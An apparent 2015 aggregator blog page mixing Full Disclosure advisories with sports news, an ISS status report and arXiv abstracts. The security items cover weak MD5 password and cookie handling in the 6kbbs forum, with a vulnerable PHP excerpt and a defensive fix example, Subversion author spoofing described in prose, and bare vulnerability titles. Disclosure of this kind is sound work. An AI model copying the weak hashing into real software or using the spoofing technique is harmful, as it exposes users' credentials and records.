[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities*

Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1 v8.0
Tested Version: v7.1 v8.0
Advisory Publication: June 08, 2015
Latest Update: June 10, 2015
Vulnerability Type: Inadequate Encryption Strength [CWE-326]
CVE Reference: *
CVSS Severity (version 2.0):
Discover and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing)

*Recommendation Details:*

*(1) Vendor & Product Description:*

Vendor: 6kbbs

*Product & Vulnerable Versions:* 6kbbs v7.1 v8.0

*Vendor URL & download:* 6kbbs can be obtained from here, http://ift.tt/1xQmsQh

*Product Introduction Overview:*

"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions. Forum Technical realization (a) interface: using XHTML + CSS structure, so the structure of the page, easy to modify the interface; save the transmission static page code, greatly reducing the amount of data transmitted over the network; improve the interface scalability, more in line with WEB standards, support Internet Explorer, FireFox, Opera and other major browsers. (b) Program: The ASP + ACCESS mature technology, the installation process is extremely simple, the environment is also very common."

"(1) PHP version: (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b) Currently (July 2010) is still in the testing phase, 6kbbs V8.0 is the latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent community forum process. The program is simple but not simple; fast, small; interface generous and good scalability; functional and practical. pursue superiority, good interface, practical functions of choice for subscribers."

*(2) Vulnerability Details:*

The 6kbbs web application has a computer security problem. It can be exploited by weak encryption attacks. The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.

Several 0-day web bugs in 6kbbs products have been found by other bug hunter researchers before. 6kbbs has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many web security issues have been published here.

Source Code:

    row_select_one("users","username='{$username}'");
    if(!empty($extrow) && !empty($extrow['salt'])){
        if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){
            $row=$extrow;
            $new_row["userpass"]=$userpass_encrypt;
            $new_row["salt"]="";
            $db->row_update("users",$new_row,"id={$extrow['id']}");
        }
    }
    }
    ?>

Source Code From: http://ift.tt/1Qs7B73

We can see that the "userpass" value stored in the cookie was encrypted using the user password "$userpass" directly, and there is no "HttpOnly" attribute at all. Since md5 is used for the encryption, it is easy for hackers to break the encrypted message.

"The MD5 message-digest cryptography algorithm is a widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32 digit hexadecimal number. Papers about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile, researchers focusing on it spread in Computer Science, Computer Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety of cryptographic applications, and is also commonly used to verify data integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function, MD4. The source code in RFC 1321 contains a "by attribution" RSA license." (Wikipedia)

*References:*
http://ift.tt/1FbWNOx
http://ift.tt/1Qs7B75
http://ift.tt/1FbWNOz
http://ift.tt/1Qs7B77
http://ift.tt/1FbWNOC
http://ift.tt/1Qs7E2X
http://ift.tt/1FbWNOF
http://ift.tt/1J8YP6L
http://ift.tt/1FbWPWI
http://ift.tt/1FbWNOJ

Source: Gmail -> IFTTT-> Blogger
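The two weaknesses named in the 6kbbs advisory above (MD5-derived password values, and a password-derived cookie without HttpOnly) with one way to correct both. This is an added example, not 6kbbs code; the row layout, function names and session store are assumptions made for the illustration, and only the legacy formula md5(md5($userpass).$salt) comes from the excerpt.

```php
<?php
declare(strict_types=1);

// Legacy scheme visible in the advisory's excerpt: md5(md5($password) . $salt).
function legacy_hash(string $password, string $salt): string
{
    return md5(md5($password) . $salt);
}

// Verify a login and migrate the row to password_hash() on success.
// $user is a constructed row: ['id', 'userpass', 'salt'] (salt '' = already migrated).
function verify_and_upgrade(array &$user, string $password): bool
{
    if ($user['salt'] !== '') {
        // Legacy row: constant-time comparison, then replace the MD5 value.
        if (!hash_equals($user['userpass'], legacy_hash($password, $user['salt']))) {
            return false;
        }
        $user['userpass'] = password_hash($password, PASSWORD_DEFAULT);
        $user['salt'] = ''; // password_hash() embeds its own random salt
        return true;
    }
    if (!password_verify($password, $user['userpass'])) {
        return false;
    }
    if (password_needs_rehash($user['userpass'], PASSWORD_DEFAULT)) {
        $user['userpass'] = password_hash($password, PASSWORD_DEFAULT);
    }
    return true;
}

// Issue a login cookie that carries a random token instead of anything
// derived from the password. Only a SHA-256 of the token is kept server-side.
function issue_session(array &$sessions, int $userId, int $ttl = 3600): array
{
    $token = bin2hex(random_bytes(32));
    $expires = time() + $ttl;
    $sessions[hash('sha256', $token)] = ['uid' => $userId, 'exp' => $expires];
    return ['value' => $token, 'options' => [
        'expires' => $expires, 'path' => '/', 'secure' => true,
        'httponly' => true, 'samesite' => 'Lax',
    ]];
}

// Map a presented cookie value back to a user id, or null if unknown or expired.
function session_user(array $sessions, string $token): ?int
{
    $row = $sessions[hash('sha256', $token)] ?? null;
    return ($row !== null && $row['exp'] > time()) ? $row['uid'] : null;
}

// Constructed demo data: one legacy row and an empty in-memory session store.
$user = ['id' => 7, 'salt' => 'a1b2c3',
         'userpass' => legacy_hash('correct horse', 'a1b2c3')];
$sessions = [];

var_dump(verify_and_upgrade($user, 'wrong guess'));    // rejected, row untouched
var_dump(verify_and_upgrade($user, 'correct horse'));  // accepted, row migrated
var_dump($user['salt'] === ''
    && password_get_info($user['userpass'])['algoName'] !== 'unknown');
var_dump(verify_and_upgrade($user, 'correct horse'));  // accepted via password_verify()

$cookie = issue_session($sessions, $user['id']);
// In a web request (PHP >= 7.3):
//   setcookie('session', $cookie['value'], $cookie['options']);
var_dump(session_user($sessions, $cookie['value']) === 7);
var_dump(session_user($sessions, str_repeat('0', 64))); // unknown token
```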

[FD] SAP Security Notes June 2015

[FD] Apache vulnerability program faulting module ntdll.dll

Subversion HTTP servers allow spoofing svn:author property values for new revisions.

Summary:
========

Subversion's mod_dav_svn server allows setting arbitrary svn:author property values when committing new revisions. This can be accomplished using a specially crafted sequence of requests. An evil-doer can fake svn:author values on his commits. However, as authorization rules are applied to the evil-doer's true username, forged svn:author values can only happen on commits that touch the paths the evil-doer has write access to.

Doing so does not grant any additional access and does not circumvent the standard Apache authentication or authorization mechanisms. Still, an ability to spoof svn:author property values can impact data integrity in environments that rely on these values.

There are no known instances of the problem being exploited in the wild, but an exploit has been tested.

Known vulnerable:
=================

Subversion HTTPD servers 1.5.0 through 1.7.19 (inclusive)
Subversion HTTPD servers 1.8.0 through 1.8.11 (inclusive)

Known fixed:
============

Subversion 1.7.20
Subversion 1.8.13
svnserve (any version) is not vulnerable

Subversion 1.8.12 was not publicly released.

Details:
========

The Subversion http://-based protocol used for communicating with a Subversion mod_dav_svn server has two versions, v1 and v2. The v2 protocol was added in Subversion 1.7.0, but the server allows using both protocol versions for compatibility reasons. When a commit happens, the client sends a sequence of requests (POST, PUT, MERGE, etc.) that depend on the negotiated protocol version.

Usually, a server uses the name of the authenticated user as the svn:author value for a new revision. However, with a specially handcrafted v1 request sequence, a client can instruct the server to use the svn:author property that she/he provided. In this case, the server will use an arbitrary value coming from the client instead of the svn:author value originating from the authentication mechanism.

Severity:
=========

CVSSv2 Base Score: 3.5
CVSSv2 Base Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N

We consider this to be a medium risk vulnerability. An attacker needs to have commit access to the repository to exploit the vulnerability. The ability to spoof svn:author property values can impact data integrity in environments that expect the values to denote the actual commit author. The real ID of the author could still be determined using server access logs. However, it is also possible that a spoofed change could go in unnoticed.

Subversion's repository hooks might see the real ID of the author or the forged value, depending on the hook type and the hook contents:

- A start-commit hook will see the real username in the USER argument
- A start-commit hook will see the real username when performing 'svnlook propget --revprop -t TXN_NAME'
- A pre-commit hook will see the forged username when performing 'svnlook propget --revprop -t TXN_NAME'
- A post-commit hook will see the forged username when performing 'svnlook propget --revprop -r REV'

Unfortunately, no special configuration is required and all mod_dav_svn servers are vulnerable.

Recommendations:
================

We recommend all users to upgrade to Subversion 1.8.13. Users of Subversion 1.7.x or 1.8.x who are unable to upgrade may apply the included patch.

New Subversion packages can be found at: http://ift.tt/PiZBag

No workaround is available.

References:
===========

CVE-2015-0251 (Subversion)

Reported by:
============

Bruno Luiz, d4t

Patches:
========

Patch against 1.7.19:
[[[
Index: subversion/mod_dav_svn/deadprops.c
===================================================================

Source: Gmail -> IFTTT-> Blogger

Future of 2016 Centennial Copa America to be discussed

SANTIAGO, Chile (AP) The treasurer of the governing body of South American football says the future of next year's centennial Copa America will be debated in the next few days.

from FOX Sports Digital http://ift.tt/1S8Fvvb
via IFTTT

Judge orders Chuck Blazer plea agreement unsealed

NEW YORK (AP) A judge has ordered federal prosecutors to unseal the plea agreement between former FIFA executive committee member Chuck Blazer and the U.S. government.

from FOX Sports Digital http://ift.tt/1I7pE8T
via IFTTT

Paraguay's Senate votes to end soccer confederation immunity

ASUNCION, Paraguay (AP) Paraguay's Senate voted Thursday to repeal a law giving immunity to the headquarters of South America's soccer confederation, the latest fallout from a sweeping U.S. investigation into an alleged bribery scheme in FIFA.

from FOX Sports Digital http://ift.tt/1I7pE8S
via IFTTT

[FD] [KIS-2015-03] Concrete5 <= 5.7.4 (Access.php) SQL Injection Vulnerability


Source: Gmail -> IFTTT-> Blogger

Anonymous on Twitter: "UK schools are using spyware to monitor students' ideology. #Anonymous ...

#Anonymous ... 0racle alex bugosi OlgaMaria Carmen Fatema Abdullah Renata D'Ávila InvasionGod Anonymous anonymousKOREA Anonymous.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/LatestAnonNews/status/608818803414212609&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNH9usqe8Rj8zC47NR1cHCzMEJb57A
via IFTTT

[FD] [KIS-2015-02] Concrete5 <= 5.7.3.1 Multiple Reflected Cross-Site Scripting Vulnerabilities


Source: Gmail -> IFTTT-> Blogger

[FD] [KIS-2015-01] Concrete5 <= 5.7.3.1 (sendmail) Remote Code Execution Vulnerability


Source: Gmail -> IFTTT-> Blogger

Orioles: SP Miguel Gonzalez (groin) placed on 15-day DL; P Mike Wright (2.96 ERA in 4 starts) recalled from Triple-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Zimbabwe team misses flight amid payment dispute

HARARE, Zimbabwe (AP) Zimbabwe has missed its flight for a 2017 African Cup of Nations qualifier in Malawi because of a dispute with the national federation over unpaid bonuses and allowances.

from FOX Sports Digital http://ift.tt/1TemN6F
via IFTTT

Argentines wanted in FIFA case ask to remain free

BUENOS AIRES, Argentina (AP)

from FOX Sports Digital http://ift.tt/1GhvlDf
via IFTTT

Paraguay's Senate votes to repeal CONMEBOL immunity

ASUNCION, Paraguay (AP) Paraguay's Senate has voted to repeal a law giving immunity to the headquarters of South America's soccer confederation.

from FOX Sports Digital http://ift.tt/1TemKbf
via IFTTT

15 arrested in fixing probe led by anti-Mafia authorities

CATANZARO, Italy (AP) Fifteen people have been arrested as part of a match-fixing inquiry led by anti-Mafia prosecutors in the southern town of Catanzaro.

from FOX Sports Digital http://ift.tt/1Gw89CD
via IFTTT

Bursaspor out of Europa League after appeal to CAS rejected

LAUSANNE, Switzerland (AP) Turkish club Bursaspor has been excluded from the Europa League next season after failing in its appeal against a one-year ban from UEFA for breaking the governing body's financial fair play rules.

from FOX Sports Digital http://ift.tt/1FbqPC6
via IFTTT

Daniel Alves called up for Brazil's Copa America squad

SAO PAULO (AP) Barcelona right back Daniel Alves has been added to Brazil's Copa America squad.

from FOX Sports Digital http://ift.tt/1B5v0Vh
via IFTTT

At Copa America, Neymar gets new chance to lead Brazil

SAO PAULO (AP) An injury robbed Neymar of a chance to help Brazil win its home World Cup. Almost a year later, the youngster is back with another opportunity to show he can lead the national team to glory.

from FOX Sports Digital http://ift.tt/1GvE1ac
via IFTTT

FIFA's top spokesman leaves job, Blatter urged to do same

GENEVA (AP) FIFA's top spokesman left his job Thursday, hours after Sepp Blatter was urged to do the same by the European Parliament.

from FOX Sports Digital http://ift.tt/1QOTaoK
via IFTTT

Jose Mourinho banned from driving for 6 months for speeding

LONDON (AP) A British court has banned Chelsea manager Jose Mourinho from driving for six months after he was caught speeding.

from FOX Sports Digital http://ift.tt/1Msbra4
via IFTTT

ISS Daily Summary Report – 06/10/15

Change of Command Ceremony: In preparation for 41S crew departure tomorrow, Virts handed over command of the ISS to Padalka this morning. During the event, all crew members discussed with Houston and Russian Flight Control Teams their roles and responsibilities for the timeframe between this event and the departure of Soyuz.

Human Research Program (HRP) Operations: Kelly, Cristoforetti, and Kornienko performed a suite of HRP activities today. Kelly and Cristoforetti each collected saliva and urine samples and inserted them in the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for Microbiome, Salivary Markers. Kelly also collected samples for Twins Study, Biochemical Profile, and Cardio Ox. Kelly and Kornienko performed their Fine Motor Skills (FMS) and Reaction Self-Test (RST) activities.

The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time).

Salivary Markers samples will be used to measure markers of latent viral reactivation (a global indicator of immune impairment and infection risk) in conjunction with salivary antimicrobial proteins and immune cell functional assays.

Twins Study is an integrated compilation of ten different studies led by multiple PIs at multiple centers. The studies take advantage of a very unique opportunity to look at the effects of space travel on identical twins, one of whom experiences space travel for one year; the other remains earth-bound for that same year. The study looks at changes in the human body in the fields of genetics, psychology, physiology, microbiology, and immunology.

Cardio Ox determines whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Crew members provide blood and urine samples to assess biomarkers before launch, three sessions while in space, and again post-flight. Ultrasound scans of the carotid and brachial arteries will be obtained at the same time points, as well as through 5 years after landing as an indicator of cardiovascular health.

Fine Motor Skills addresses how fine motor performance in microgravity trend/vary over the duration of a six-month and year-long space mission; how fine motor performance on orbit compare with that of a closely matched participant on Earth; and how performance trend/vary before and after gravitational transitions, including the periods of early flight adaptation, and very early/near immediate post-flight periods.

Reaction Self-Test is a portable, five-minute task that enables astronauts to monitor the daily effects of fatigue on performance while in space. Sleep restrictions and residual effects from sleep medications, slam shifts that change the sleep/wake cycle, and effects from spacewalks can cause fatigue and degrade astronaut performance. Periodically during the mission, and in association with major events, an astronaut performs a reaction-time test on a computer to measure changes in responses.

Crew Quarters (CQ) Starboard Cleaning: In preparation for his departure from the ISS, Virts cleaned his CQ including intake and exhaust ducts, fans and airflow sensors.

Today’s Planned Activities
All activities were completed unless otherwise noted.

TWIN – Saliva Sample Collection HRF Sample Collection and Stowage Prep Self-Reaction Test. Reaction Time Test (morning) HRF – Sample MELFI Insertion HRF Urine Sample Collection TWIN – Urine Sample Collection HRF – Sample MELFI Insertion WRM – Potable bus sample ТК 715 Return Stowage / r/g 8970 NAPOR-miniRSA. Cleaning БЗУ-М vents / r/g 9058 Analysis of SM Atmosphere for Freon Using Freon Leak Analyzer/Detector (ФИТ) FINEMOTR – Experiment Ops STRUKTURA. Deactivation of crystallization process r/g 9055 STRUKTURA. Photography during mixing ops / r/g 9056 TWIN – Urine Sample Collection BIOSIGNAL. Hardware Transfer to ТК 715 r/g 9054 Transfer of LUCH-2 kit to Soyuz 715 / r/g 9055 Fine Motor Skills – Experiment Ops HRF – Sample MELFI Insertion SEISMOPROGNOZ. Repeat 06/08/15 Data Downlink. / r/g 9059 Data Prep for Return Connecting Sony DC-V700 charger to b/u LIV Video power feeder. / r/g 9061 HRF Urine Sample Collection Crew Quarter Cleaning ПС1, ПС2 Dust Collector Filter Replacement in FBG HRF – Sample MELFI Insertion TWIN – Blood Collection Hardware Setup TWIN – Urine Sample Collection Comm Check and Ops from ТК 715 via RGS HRF – Sample MELFI Insertion Soyuz 715 P/L Container Transfer Operations Report r/g 8970 WRS – Recycle Tank Fill Download Pille Dosimeter Readings / r/g 9044 HRF Urine Sample Collection HRF – Sample MELFI Insertion HRF- Blood collection setup Personal Medication Stowage URAGAN. Observation and photography using Photo Equipment / r/g 9057 TWIN – Urine Sample Collection IMS Delta File Prep HRF – Sample MELFI Insertion Signing ISS RS Handover Protocol / r/g 9040 CONTENT. Experiment Ops / r/g 9053 PAO Event Health Maintenance System Med Pack Prelanding-Medication HRF Urine Sample Collection HRF – Sample MELFI Insertion Change of Command Ceremony CQ Audio Cable Configuration Self-Reaction Test. Reaction Time Test (evening) ТПК 715 [СА] cool down prior to descent VLV КР1 “ХСА MIN”, VLV КР2 ХСА MAX

Completed Task List Items
None

Ground Activities
All activities were completed on schedule unless otherwise noted.
CQ cleaning

Three-Day Look Ahead:
Thursday, 06/11: 41S undock/landing, Sprint Portable Pulmonary Function setup, Twin Studies
Friday, 06/12: Sprint VO2 ops, Radiation Dosimetry
Saturday, 06/13: Crew off duty, housekeeping

QUICK ISS Status – Environmental Control Group:

Component | Status
Elektron | On
Vozdukh | Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”) | On
[СКВ] 2 – SM Air Conditioner System (“SKV2”) | Off
Carbon Dioxide Removal Assembly (CDRA) Lab | Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3 | Operate
Major Constituent Analyzer (MCA) Lab | Shutdown
Major Constituent Analyzer (MCA) Node 3 | Operate
Oxygen Generation Assembly (OGA) | Process
Urine Processing Assembly (UPA) | Process
Trace Contaminant Control System (TCCS) Lab | Off
Trace Contaminant Control System (TCCS) Node 3 | Full Up

from ISS On-Orbit Status Report http://ift.tt/1FLpFPs
via IFTTT

Blatter spokesman De Gregorio to leave FIFA immediately

ZURICH (AP) FIFA says its director of public affairs Walter De Gregorio, who is closely tied to President Sepp Blatter, is leaving his job.

from FOX Sports Digital http://ift.tt/1B51ezQ
via IFTTT

European lawmakers urge FIFA president Blatter to go now

STRASBOURG, France (AP) European lawmakers have urged FIFA President Sepp Blatter to step down immediately, and for an interim leader to be appointed.

from FOX Sports Digital http://ift.tt/1MrXCIN
via IFTTT

South Korea forward Kang tests positive for steroid

SEOUL, South Korea (AP) K-league officials say South Korea forward Kang Soo-il has failed a doping test.

from FOX Sports Digital http://ift.tt/1B4S2LV
via IFTTT

NSFW illustrations of anonymous sexual encounters

A sneak peek of the Anonymous Sex Journal's collaboration with Riposte Magazine.

from Google Alert - anonymous http://ift.tt/1FazViA
via IFTTT

Verratti leaves Italy's squad with injured calf

FLORENCE, Italy (AP) Midfielder Marco Verratti has left Italy's training camp with a left calf injury a day before a key match against Croatia.

from FOX Sports Digital http://ift.tt/1Ksip06
via IFTTT

Germany, Portugal, Brazil reach quarterfinals at U20 WCup

WELLINGTON, New Zealand (AP) Former champions Germany, Portugal and Brazil earned places in the quarterfinals of the Under-20 World Cup on Thursday, bringing more familiar names to a last-eight lineup that includes a number of upstarts.

from FOX Sports Digital http://ift.tt/1FKZI2p
via IFTTT

Lyon midfielder Clement Grenier signs new 2-year deal

LYON, France (AP) Lyon midfielder Clement Grenier has signed a new two-year contract until 2018.

from FOX Sports Digital http://ift.tt/1e58lhq
via IFTTT

Wednesday, June 10, 2015

Brazil beats Honduras 1-0 in final warmup for Copa America

PORTO ALEGRE, Brazil (AP) Brazil was boosted by the return of Neymar and defeated Honduras 1-0 on Wednesday in its final warmup before traveling to Chile for the Copa America.

from FOX Sports Digital http://ift.tt/1dy4aKl
via IFTTT

Australia players, football federation in pay dispute

SYDNEY (AP) A union representing Socceroos players says Football Federation Australia has not handed over match payments and bonuses owed to the national team and has filed a grievance with a disputes arbitrator.

from FOX Sports Digital http://ift.tt/1KXBVzP
via IFTTT

I have a new follower on Twitter


Tony Zayas
Proud Father and Husband. Chicago sports, UFC and Iowa Hawkeye football enthusiast. Marketer, Strategist & Social media guy @Proforma
Cleveland, OH
http://t.co/6oaAybm9nS
Following: 3720 - Followers: 5071

June 10, 2015 at 10:54PM via Twitter http://twitter.com/TonyZayas

Orioles Highlight: 3 great defensive plays lead to fourth-straight victory over Red Sox, 5-2; Wei-Yin Chen 2 ER, 5.0 IP (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Cordny Nederkoorn
Enthusiastic Blogger / Journalist | #softwaretesting | #SaaS | #security | #privacy | #identitymanagement

http://t.co/jyMhDHCqEk
Following: 15678 - Followers: 16686

June 10, 2015 at 09:52PM via Twitter http://twitter.com/TestingSaaS

Former Brazil star Zico wants to run for FIFA president

RIO DE JANEIRO (AP) Former Brazil star Zico wants to run for the presidency of FIFA, even though he believes the odds are stacked against him being elected.

from FOX Sports Digital http://ift.tt/1Qq1mAF
via IFTTT

On-the-Job Learning with Bayesian Decision Theory. (arXiv:1506.03140v1 [cs.AI])

How can we deploy a high-accuracy system starting with zero training examples? We consider an "on-the-job" setting, where as inputs arrive, we use crowdsourcing to resolve uncertainty where needed and output our prediction when confident. As the model improves over time, the reliance on crowdsourcing queries decreases. We cast our setting as a stochastic game based on Bayesian decision theory, which allows us to balance latency, cost, and accuracy objectives in a principled way. Computing the optimal policy is intractable, so we develop an approximation based on Monte Carlo Tree Search. We tested our approach across three datasets---named-entity recognition, sentiment classification, and image classification. On the NER task we obtained a 6--7 fold reduction in cost compared to full human annotation. We also achieve a 17% F$_1$ improvement over having a single human label the whole set, and a 28% F$_1$ improvement over online learning.



from cs.AI updates on arXiv.org http://ift.tt/1TcnYUd
via IFTTT

Teaching Machines to Read and Comprehend. (arXiv:1506.03340v1 [cs.CL])

Teaching machines to read natural language documents remains an elusive challenge. Machine reading systems can be tested on their ability to answer questions posed on the contents of documents that they have seen, but until now large scale training and test datasets have been missing for this type of evaluation. In this work we define a new methodology that resolves this bottleneck and provides large scale supervised reading comprehension data. This allows us to develop a class of attention based deep neural networks that learn to read real documents and answer complex questions with minimal prior knowledge of language structure.



from cs.AI updates on arXiv.org http://ift.tt/1F9CCkt
via IFTTT

Contextual Bandits with Global Constraints and Objective. (arXiv:1506.03374v1 [cs.LG])

We consider the contextual version of a multi-armed bandit problem with global convex constraints and concave objective function. In each round, the outcome of pulling an arm is a context-dependent vector, and the global constraints require the average of these vectors to lie in a certain convex set. The objective is a concave function of this average vector. The learning agent competes with an arbitrary set of context-dependent policies. This problem is a common generalization of problems considered by Badanidiyuru et al. (2014) and Agrawal and Devanur (2014), with important applications. We give computationally efficient algorithms with near-optimal regret, generalizing the approach of Agarwal et al. (2014) for the non-constrained version of the problem. For the special case of budget constraints our regret bounds match those of Badanidiyuru et al. (2014), answering their main open question of obtaining a computationally efficient algorithm.



from cs.AI updates on arXiv.org http://ift.tt/1S61oeE
via IFTTT

On the Prior Sensitivity of Thompson Sampling. (arXiv:1506.03378v1 [cs.LG])

The empirically successful Thompson Sampling algorithm for stochastic bandits has drawn much interest in understanding its theoretical properties. One important benefit of the algorithm is that it allows domain knowledge to be conveniently encoded as a prior distribution to balance exploration and exploitation more effectively. While it is generally believed that the algorithm's regret is low (high) when the prior is good (bad), little is known about the exact dependence. In this paper, we fully characterize the algorithm's worst-case dependence of regret on the choice of prior, focusing on a special yet representative case. These results also provide insights into the general sensitivity of the algorithm to the choice of priors. In particular, with $p$ being the prior probability mass of the true reward-generating model, we prove $O(\sqrt{T/p})$ and $O(\sqrt{(1-p)T})$ regret upper bounds for the bad- and good-prior cases, respectively, as well as matching lower bounds. Our proofs rely on the discovery of a fundamental property of Thompson Sampling and make heavy use of martingale theory, both of which appear novel in the literature, to the best of our knowledge.



from cs.AI updates on arXiv.org http://ift.tt/1e47sG4
via IFTTT

The Online Discovery Problem and Its Application to Lifelong Reinforcement Learning. (arXiv:1506.03379v1 [cs.LG])

Transferring knowledge across a sequence of related tasks is an important challenge in reinforcement learning. Despite much encouraging empirical evidence that shows benefits of transfer, there has been very little theoretical analysis. In this paper, we study a class of lifelong reinforcement-learning problems: the agent solves a sequence of tasks modeled as finite Markov decision processes (MDPs), each of which is from a finite set of MDPs with the same state/action spaces and different transition/reward functions. Inspired by the need for cross-task exploration in lifelong learning, we formulate a novel online discovery problem and give an optimal learning algorithm to solve it. Such results allow us to develop a new lifelong reinforcement-learning algorithm, whose overall sample complexity in a sequence of tasks is much smaller than that of single-task learning, with high probability, even if the sequence of tasks is generated by an adversary. Benefits of the algorithm are demonstrated in a simulated problem.



from cs.AI updates on arXiv.org http://ift.tt/1F9CEsw
via IFTTT

Fast Online Clustering with Randomized Skeleton Sets. (arXiv:1506.03425v1 [cs.AI])

We present a new fast online clustering algorithm that reliably recovers arbitrary-shaped data clusters in high-throughput data streams. Unlike the existing state-of-the-art online clustering methods based on k-means or k-medoid, it does not make any restrictive generative assumptions. In addition, in contrast to existing nonparametric clustering techniques such as DBScan or DenStream, it gives provable theoretical guarantees. To achieve fast clustering, we propose to represent each cluster by a skeleton set which is updated continuously as new data is seen. A skeleton set consists of weighted samples from the data where weights encode local densities. The size of each skeleton set is adapted according to the cluster geometry. The proposed technique automatically detects the number of clusters and is robust to outliers. The algorithm works for the infinite data stream where more than one pass over the data is not feasible. We provide theoretical guarantees on the quality of the clustering and also demonstrate its advantage over the existing state-of-the-art on several datasets.



from cs.AI updates on arXiv.org http://ift.tt/1F9CEsu
via IFTTT

Dynamic Consistency of Conditional Simple Temporal Networks via Mean Payoff Games: a Singly-Exponential Time DC-Checking. (arXiv:1505.00828v3 [cs.DS] UPDATED)

Conditional Simple Temporal Network (CSTN) is a constraint-based graph-formalism for conditional temporal planning. It offers a more flexible formalism than the equivalent CSTP model of Tsamardinos, Vidal and Pollack, from which it was derived mainly as a sound formalization. Three notions of consistency arise for CSTNs and CSTPs: weak, strong, and dynamic. Dynamic consistency is the most interesting notion, but it is also the most challenging and it was conjectured to be hard to assess. Tsamardinos, Vidal and Pollack gave a doubly-exponential time algorithm for deciding whether a CSTN is dynamically-consistent and to produce, in the positive case, a dynamic execution strategy of exponential size. In the present work we offer a proof that deciding whether a CSTN is dynamically-consistent is coNP-hard and provide the first singly-exponential time algorithm for this problem, also producing a dynamic execution strategy whenever the input CSTN is dynamically-consistent. The algorithm is based on a novel connection with Mean Payoff Games, a family of two-player combinatorial games on graphs well known for having applications in model-checking and formal verification. The presentation of such connection is mediated by the Hyper Temporal Network model, a tractable generalization of Simple Temporal Networks whose consistency checking is equivalent to determining Mean Payoff Games. In order to analyze the algorithm we introduce a refined notion of dynamic-consistency, named $\epsilon$-dynamic-consistency, and present a sharp lower bounding analysis on the critical value of the reaction time $\hat{\varepsilon}$ where the CSTN transits from being, to not being, dynamically-consistent. The proof technique introduced in this analysis of $\hat{\varepsilon}$ is applicable more in general when dealing with linear difference constraints which include strict inequalities.



from cs.AI updates on arXiv.org http://ift.tt/1DRnNT1
via IFTTT

Orioles: A red-hot bullpen (3 R last 18.1 IP) looks to stop Red Sox 4th straight time in Baltimore, 7 ET ESPN/WatchESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Red Sox: Rick Porcello looks to build on last outing (8 IP, 2 R, 0 BBs vs. Twins) at Orioles; 7 pm ET on ESPN/WatchESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

MLB: Orioles look to make it 4 wins in a row at home against the Red Sox (David Ortiz benched); 7 pm ET ESPN/WatchESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

PicResize.com (@picresize) favorited one of your Tweets!

PicResize.com favorited your Tweet.

Patrick McGuire @mistermcguire: [FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin ift.tt/1MpBxdJ

Source: Gmail -> IFTTT-> Blogger

Wood scores late to give US a 2-1 win over Germany

COLOGNE, Germany (AP) Substitute Bobby Wood scored in the 87th minute to give the United States a 2-1 victory over World Cup champion Germany in a friendly on Wednesday.

from FOX Sports Digital http://ift.tt/1B7dyiU
via IFTTT

Former Brazil star Zico running for FIFA president

RIO DE JANEIRO (AP) Former Brazil star Zico says he wants to run for the presidency of FIFA.

from FOX Sports Digital http://ift.tt/1MpzxSP
via IFTTT

Wood's 87th-minute goal lifts US to 2-1 win at Germany

COLOGNE, Germany (AP) Bobby Wood scored a late goal for the second time in six days to give the United States its first victory at a European soccer power, lifting the Americans to a 2-1 win at World Cup champion Germany in an exhibition game Wednesday.

from FOX Sports Digital http://ift.tt/1Qpy2ua
via IFTTT

[FD] 2 vulns 1 line in RNCryptor (PHP) + Call to Action

[FD] Authentication Bypass in Pandora FMS

================================================================ Authentication Bypass in Pandora FMS ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin

Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: http://ift.tt/1F8mVtO
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://ift.tt/1QoCBox
Vendor Contact: plugins@wordpress.org

Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.

